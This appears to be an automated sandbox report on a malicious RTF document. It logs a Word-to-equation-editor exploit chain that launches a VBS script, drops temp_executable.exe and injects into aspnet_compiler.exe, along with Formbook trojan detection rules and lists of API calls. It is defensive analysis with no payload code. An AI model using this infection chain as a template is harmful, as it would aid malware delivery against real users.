          Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0042BDA3 NtClose,7_2_0042BDA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009107AC NtCreateMutant,LdrInitializeThunk,7_2_009107AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090F9F0 NtClose,LdrInitializeThunk,7_2_0090F9F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0090FAE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0090FB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0090FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009100C4 NtCreateFile,7_2_009100C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00910048 NtProtectVirtualMemory,7_2_00910048
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00910078 NtResumeThread,7_2_00910078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00910060 NtQuerySection,7_2_00910060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009101D4 NtSetValueKey,7_2_009101D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0091010C NtOpenDirectoryObject,7_2_0091010C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00910C40 NtGetContextThread,7_2_00910C40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009110D0 NtOpenProcessToken,7_2_009110D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00911148 NtOpenThread,7_2_00911148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090F8CC NtWaitForSingleObject,7_2_0090F8CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090F900 NtReadFile,7_2_0090F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00911930 NtSetContextThread,7_2_00911930
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090F938 NtWriteFile,7_2_0090F938
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FAB8 NtQueryValueKey,7_2_0090FAB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FAD0 NtAllocateVirtualMemory,7_2_0090FAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FA20 NtQueryInformationFile,7_2_0090FA20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FA50 NtEnumerateValueKey,7_2_0090FA50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FBB8 NtQueryInformationToken,7_2_0090FBB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FBE8 NtQueryVirtualMemory,7_2_0090FBE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FB50 NtCreateKey,7_2_0090FB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FC90 NtUnmapViewOfSection,7_2_0090FC90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FC30 NtOpenProcess,7_2_0090FC30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FC48 NtSetInformationFile,7_2_0090FC48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FC60 NtMapViewOfSection,7_2_0090FC60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00911D80 NtSuspendThread,7_2_00911D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FD8C NtDelayExecution,7_2_0090FD8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FD5C NtEnumerateKey,7_2_0090FD5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FEA0 NtReadVirtualMemory,7_2_0090FEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FED0 NtAdjustPrivilegesToken,7_2_0090FED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FE24 NtWriteVirtualMemory,7_2_0090FE24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FFB4 NtCreateSection,7_2_0090FFB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FFFC NtCreateProcessEx,7_2_0090FFFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0090FF34 NtQueueApcThread,7_2_0090FF34
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 6_2_001870206_2_00187020
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 6_2_001828E06_2_001828E0
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 6_2_001821086_2_00182108
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 6_2_001867216_2_00186721
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 6_2_001820F86_2_001820F8
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 6_2_00180A786_2_00180A78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004010007_2_00401000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040F8037_2_0040F803
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004160B37_2_004160B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004012607_2_00401260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040FA237_2_0040FA23
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402ADD7_2_00402ADD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402AE07_2_00402AE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040DAA37_2_0040DAA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004023407_2_00402340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0042E3337_2_0042E333
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004023347_2_00402334
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402E707_2_00402E70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040F7FA7_2_0040F7FA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0091E0C67_2_0091E0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0091E2E97_2_0091E2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009C63BF7_2_009C63BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009463DB7_2_009463DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009223057_2_00922305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0096A37B7_2_0096A37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009A443E7_2_009A443E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0093C5F07_2_0093C5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009A05E37_2_009A05E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009665407_2_00966540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009246807_2_00924680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0092E6C17_2_0092E6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0096A6347_2_0096A634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009C26227_2_009C2622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0092C7BC7_2_0092C7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0092C85C7_2_0092C85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0094286D7_2_0094286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009C098E7_2_009C098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009229B27_2_009229B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009369FE7_2_009369FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009B49F57_2_009B49F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009CCBA47_2_009CCBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009A6BCB7_2_009A6BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009C2C9C7_2_009C2C9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009AAC5E7_2_009AAC5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00950D3B7_2_00950D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0092CD5B7_2_0092CD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00952E2F7_2_00952E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0093EE4C7_2_0093EE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009BCFB17_2_009BCFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00992FDC7_2_00992FDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00930F3F7_2_00930F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0094D0057_2_0094D005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0093905A7_2_0093905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009230407_2_00923040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0099D06D7_2_0099D06D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009AD13F7_2_009AD13F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009C12387_2_009C1238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0091F3CF7_2_0091F3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009273537_2_00927353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009554857_2_00955485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009314897_2_00931489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0095D47D7_2_0095D47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009C35DA7_2_009C35DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0092351F7_2_0092351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009A579A7_2_009A579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009557C37_2_009557C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009B771D7_2_009B771D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0099F8C47_2_0099F8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009BF8EE7_2_009BF8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009A59557_2_009A5955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009A394B7_2_009A394B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009D3A837_2_009D3A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009ADBDA7_2_009ADBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0091FBD77_2_0091FBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00947B007_2_00947B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009BFDDD7_2_009BFDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009ABF147_2_009ABF14
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0094DF7C7_2_0094DF7C
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\temp_executable.exe E350330729257731AC3E4CB80CFCB243F8FD629A2AB5BC11D7A1E89B3945C716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0091E2A8 appears 60 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0091DF5C appears 130 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0098F970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0096373B appears 253 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00963F92 appears 132 times
          Source: eMJ2QgQF4u.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.temp_executable.exe.2b0000.1.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
          Source: 6.2.temp_executable.exe.26c31c8.6.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
          Source: 6.2.temp_executable.exe.26bb524.8.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@9/10@1/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$J2QgQF4u.rtfJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMutant created: NULL
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7D1B.tmpJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: eMJ2QgQF4u.rtfReversingLabs: Detection: 47%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasadhlp.dllJump to behavior
